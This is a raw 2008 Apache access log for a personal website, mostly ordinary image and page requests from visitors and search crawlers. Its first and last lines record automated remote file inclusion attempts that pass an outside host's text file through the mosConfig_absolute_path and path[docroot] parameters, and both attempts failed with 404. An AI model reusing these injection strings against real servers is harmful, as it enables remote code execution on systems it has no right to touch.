216.127.70.91 - - [11/Jun/2008:22:53:08 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://user164.helloweb.eu/idilegal.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
202.88.245.137 - - [11/Jun/2008:22:53:11 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:53:11 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:53:22 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:53:50 -0500] "GET /costume/enter1.gif HTTP/1.1" 206 19831 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
202.88.245.137 - - [11/Jun/2008:22:53:56 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
66.249.70.213 - - [11/Jun/2008:22:56:48 -0500] "GET /logs/access_log.1208044800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.125 - - [11/Jun/2008:23:00:25 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
201.24.2.220 - - [11/Jun/2008:23:03:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
